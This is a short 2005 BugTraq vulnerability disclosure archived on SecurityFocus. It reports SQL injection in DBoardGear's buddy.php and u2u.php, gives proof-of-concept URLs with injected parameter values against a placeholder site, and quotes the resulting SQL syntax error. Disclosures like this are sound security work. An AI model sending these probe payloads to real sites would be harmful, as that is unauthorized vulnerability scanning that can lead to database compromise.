BugTraq
DBoardGear SQL Injection Oct 24 2005 01:49PM
almaster hotmail com
DboardGear ..
Search By Google :-
by DboardGear

Gr33tz :-
aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster (at) hotmail (dot) com [email concealed]|-
Security4Arab .. A'Where Home ..

1- SQL Injection in buddy.php
http://www.site.com/dboard/buddy.php?action=add&buddy=|aLMaSTeR

2-SQL Injection in u2a.php
http://www.site.com/dboard/u2u.php?action=view&u2uid=|aLMaSTeR

Error:
You have an error in your SQL syntax near '' at line 1

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus